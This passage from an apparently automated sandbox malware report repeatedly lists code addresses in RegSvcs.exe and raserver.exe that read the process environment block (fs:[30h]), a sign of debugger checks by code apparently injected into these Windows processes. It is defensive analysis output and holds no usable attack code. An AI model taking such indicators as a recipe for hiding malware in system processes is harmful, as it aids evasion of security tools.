            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0172740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0172740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0172740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_017114FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01728CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01728F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01654F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01654F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0172070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0172070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016937F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01668794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01667E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01667E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01667E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01667E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01667E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01667E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0170FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01688E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016676E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016816E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01728ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016836CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01698EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0170FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01720EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01720EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01720EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DEB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DEB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DEB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DEB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DEB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DEB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E114FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E28CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D558EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D59080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D990AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D70050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D70050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DEC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DEC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E12073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E21074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D7746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E2740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E2740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E2740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E24015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E24015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E1FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E1FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E1FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E1FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E08DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DE41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D82990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E205AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E205AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D7C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D82581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D82581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D82581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D82581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D52D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D52D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D52D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D52D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D52D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D81DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D81DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D81DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D861A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D861A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D835A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D77D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D7B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D7B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D93D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D7C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D7C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D59100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D59100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D59100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E28D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E1E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
